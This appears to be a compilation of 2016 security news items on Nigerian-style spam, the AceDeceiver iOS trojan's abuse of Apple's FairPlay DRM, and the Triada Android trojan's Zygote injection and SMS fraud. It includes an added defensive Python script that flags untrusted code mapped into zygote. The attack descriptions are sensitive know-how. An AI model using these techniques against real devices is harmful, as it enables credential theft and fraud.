The well-known “Nigerian” scammers also used terrorism in their emails, and according to the Kaspersky Lab report the number of these emails has increased considerably. These spammers previously preferred long emails with a detailed story and links to news reports to make it more convincing. Now they only send short messages with no detail, asking the recipients to get in touch.

“Unfortunately we are seeing our previous predictions about the criminalization of spam coming true. Fraudsters are using diverse methods to attract user attention, and to make them drop their guard. Spammers are employing a diversity of languages, social engineering methods, different types of malicious attachments, as well as the partial personalization of email text to look more convincing. The fake messages often imitate notifications from well-known organizations and services. This is raising spam to a new dangerous level.” – warns Daria Gudkova, Spam Analysis Expert, Kaspersky Lab.



AceDeceiver : First iOS Trojan Exploits Apple DRM Design

Palo Alto Networks discovered a new family of iOS malware that successfully infected non-jailbroken devices. They’ve named it “AceDeceiver”.

What makes AceDeceiver different from previous iOS malware is that, instead of abusing enterprise certificates as some iOS malware has over the past two years, AceDeceiver installs itself without any enterprise certificate at all. It does so by exploiting design flaws in Apple’s DRM mechanism, and even though Apple has removed AceDeceiver from the App Store, it may still spread thanks to a novel attack vector.

AceDeceiver is the first iOS malware Palo Alto Networks has seen that abuses certain design flaws in Apple’s DRM protection mechanism, FairPlay, to install malicious apps on iOS devices regardless of whether they are jailbroken. The technique is called “FairPlay Man-In-The-Middle (MITM)” and has been used since 2013 to spread pirated iOS apps, but this is the first time it has been seen used to spread malware.

Note : The FairPlay MITM attack technique was also presented at the USENIX Security Symposium in 2014; however, attacks using this technique are still occurring successfully.


AceDeceiver Sneaks Into App Store

Three different iOS apps in the AceDeceiver family were uploaded to the official App Store between July 2015 and February 2016, and all of them claimed to be wallpaper apps.

These apps bypassed Apple’s code review at least seven times (the first upload of each app, plus four rounds of code updates, each of which requires a further review by Apple) using a method similar to that used by ZergHelper: the app tailors its behavior to the geographic region in which it is being executed.

In this case, AceDeceiver only displays malicious behavior when the user is located in China, but that would be easy for the attacker to change at any time.

Apple removed these three apps from the App Store after Palo Alto Networks reported them in late February 2016. However, the attack is still viable, because the FairPlay MITM attack only requires the apps to have been available in the App Store once. As long as an attacker has obtained a copy of the authorization from Apple, the apps can still be spread without being in the App Store.


How AceDeceiver Works

To carry out the attack, the author created a Windows client called “爱思助手 (Aisi Helper)” to perform the FairPlay MITM attack. Aisi Helper purports to be software that provides services for iOS devices such as system re-installation, jailbreaking, system backup, device management and system cleaning.


But it also surreptitiously installs the malicious apps on any iOS device connected to the PC on which Aisi Helper is installed. (Of note, only the most recent app is installed on the iOS device at the time of infection, not all three at once.) These malicious iOS apps connect to a third-party app store controlled by the author, from which users can download iOS apps or games.

The app encourages users to enter their Apple IDs and passwords to unlock more features, and any credentials provided are encrypted and uploaded to AceDeceiver’s C2 server. Palo Alto Networks also identified some earlier versions of AceDeceiver that carried enterprise certificates dated March 2015.




Kaspersky Discovers Triada – A Mobile Trojan

4 March 2016 – Kaspersky Lab experts have detected Triada, a new Trojan targeting Android devices that can be compared to Windows-based malware in terms of its complexity. It is stealthy, modular, persistent and written by very professional cybercriminals.

Devices running the Android 4.4.4 and earlier versions of the Android OS are at greatest risk.

According to recent Kaspersky Lab research on mobile virusology, nearly half of the top 20 Trojans in 2015 were malicious programs able to gain super-user access rights. Super-user privileges let cybercriminals install applications on the phone without the user’s knowledge.

This type of malware propagates through applications that users download and install from untrusted sources. Such apps can sometimes be found in the official Google Play store, masquerading as a game or entertainment application. They can also be installed during an update of an existing popular application, and are occasionally pre-installed on the device.

There are 11 known mobile Trojan families that use root privileges. Three of them – Ztorg, Gorpo and Leech – act in cooperation with each other. Devices infected with these Trojans usually organize themselves into a network, creating a sort of advertising botnet that threat actors can use to install different kinds of adware. But that’s not all…

Shortly after rooting the device, the above-mentioned Trojans download and install a backdoor. This in turn downloads and activates two modules that are able to download, install and launch applications.

The application loader and the installation modules belong to different Trojan types, but all of them have been added to Kaspersky Lab’s antivirus databases under a common name: Triada.


Getting Into The Parental Android Process

A distinguishing feature of this malware is its use of Zygote, the parent of every application process on an Android device, which holds the system libraries and frameworks used by every application installed on the device. In other words, it is a daemon whose purpose is to launch Android applications.

This is the standard process from which every newly launched application is forked. It means that as soon as the Trojan gets into Zygote, it becomes part of every application process started on the device and can even change the logic of the application’s operations.

This is the first time technology like this has been seen in the wild. Prior to this a Trojan using Zygote was only known of as a proof-of-concept.

The stealth capabilities of this malware are very advanced. After getting onto the device, Triada injects itself into nearly every running process and continues to exist only in RAM. This makes it almost impossible to detect and delete using anti-malware solutions. Triada operates silently, meaning that all malicious activity is hidden both from the user and from other applications.
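One practical check for the Zygote injection described above is to look at what code is actually mapped into the zygote process. The following Python script is an added example, not from Kaspersky Lab’s report: it parses the text of `/proc/<pid>/maps` for the zygote process and reports executable mappings that do not come from the system partitions. The list of trusted path prefixes and the sample maps output are assumptions constructed for this example, and the library names in the sample are not Triada indicators.

```python
import re

# Locations from which an unmodified Android build legitimately maps code into
# zygote. Vendor builds vary; extend this list for the device being inspected.
TRUSTED_PREFIXES = ("/system/", "/vendor/", "/apex/", "/dev/", "/data/dalvik-cache/")

# One line of /proc/<pid>/maps: range perms offset dev inode [path]
MAPS_LINE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>[rwxsp-]{4})\s+"
    r"(?P<offset>[0-9a-f]+)\s+(?P<dev>\S+)\s+(?P<inode>\d+)\s*(?P<path>.*)$"
)

# Constructed maps excerpt for a 32-bit zygote (not captured from a real
# infected device). Two libraries are mapped from /data, where no code
# belongs in zygote, plus one anonymous executable region.
SAMPLE_MAPS = """\
b6f0a000-b6f2c000 r-xp 00000000 b3:0c 1537   /system/bin/app_process32
b6f2c000-b6f2d000 r--p 00021000 b3:0c 1537   /system/bin/app_process32
b6e80000-b6ea0000 r-xp 00000000 b3:0c 2211   /system/lib/libc.so
b6d00000-b6d80000 r-xp 00000000 b3:0c 2290   /system/lib/libart.so
b6c00000-b6c20000 r-xp 00000000 b3:0c 2301   /vendor/lib/libgralloc.so
b6b00000-b6b10000 rw-p 00000000 00:00 0      [anon:libc_malloc]
b6a00000-b6a08000 r-xp 00000000 b3:18 4096   /data/local/tmp/libhook.so
b6900000-b6902000 r-xp 00000000 b3:18 4102   /data/data/com.example.app/lib/libz.so
b6800000-b6801000 r-xp 00000000 00:00 0
be8a0000-be8c1000 rw-p 00000000 00:00 0      [stack]
ffff0000-ffff1000 r-xp 00000000 00:00 0      [vectors]
"""


def parse_maps(text: str):
    """Yield (perms, path) for each well-formed line of a maps file."""
    for line in text.splitlines():
        match = MAPS_LINE.match(line.strip())
        if match:
            yield match.group("perms"), match.group("path").strip()


def suspicious_mappings(maps_text: str) -> dict:
    """Executable mappings in zygote that do not come from a trusted location.

    Zygote is forked for every app, so a library injected here is inherited by
    all of them. Files under /data or /sdcard are reported as untrusted;
    unbacked executable regions are counted for review, since the runtime's
    JIT also creates them legitimately."""
    untrusted = []
    anon_exec = 0
    for perms, path in parse_maps(maps_text):
        if "x" not in perms:
            continue                      # data, heap, stack: not code
        if not path:
            anon_exec += 1                # executable region with no backing file
            continue
        if path.startswith("["):
            continue                      # [vdso], [vectors], [stack] and similar
        if not path.startswith(TRUSTED_PREFIXES):
            untrusted.append(path)
    return {"untrusted_files": untrusted, "anon_exec_regions": anon_exec}


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_MAPS
    result = suspicious_mappings(text)
    for path in result["untrusted_files"]:
        print("untrusted executable mapping in zygote:", path)
    print("anonymous executable regions to review:", result["anon_exec_regions"])
```

On a rooted device, pull the file with adb (`adb shell su -c 'cat /proc/<zygote pid>/maps'`) and pass the saved copy as the script’s first argument. Two caveats apply: a Trojan with root access can also modify /system itself, so trusting /system only holds where the system partition is verified (dm-verity, available from Android 4.4) or the device is compared against a known-good image; and since Triada hides from other applications, the maps file should be read from a trusted host rather than by an app on the suspect device.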

The complexity of the Triada Trojan’s functionality shows that very professional cybercriminals, with a deep understanding of the targeted mobile platform, are behind this malware.


Triada’s Business Model

The Triada Trojan can modify outgoing SMS messages sent by other applications, and this is now a major function of the malware. When a user makes an in-app purchase via SMS in an Android game, the fraudsters can modify the outgoing SMS so that the money goes to them instead of the game developers.

“The Triada of Ztorg, Gorpo and Leech marks a new stage in the evolution of Android-based threats. They are the first widespread malware with the potential to escalate their privileges on most devices. The majority of users attacked by the Trojans were located in Russia, India and Ukraine as well as APAC countries. It is hard to underestimate the threat of a malicious application gaining root access to a device.

Their main threat, as the example of Triada shows, is in the fact that they provide access to the device for much more advanced and dangerous malicious applications. They also have a well-thought-out architecture developed by cybercriminals who have deep knowledge of the target mobile platform,” said Nikita Buchka, Junior Malware Analyst, Kaspersky Lab.

As it is nearly impossible to uninstall this malware from a device, users have two options to get rid of it. The first is to root the device and delete the malicious applications manually. The second is to reflash the device with a clean system image.


Kaspersky Lab Products Detect Triada Trojan Components As :

  • Trojan-Downloader.AndroidOS.Triada.a
  • Trojan-SMS.AndroidOS.Triada.a
  • Trojan-Banker.AndroidOS.Triada.a
  • Backdoor.AndroidOS.Triada

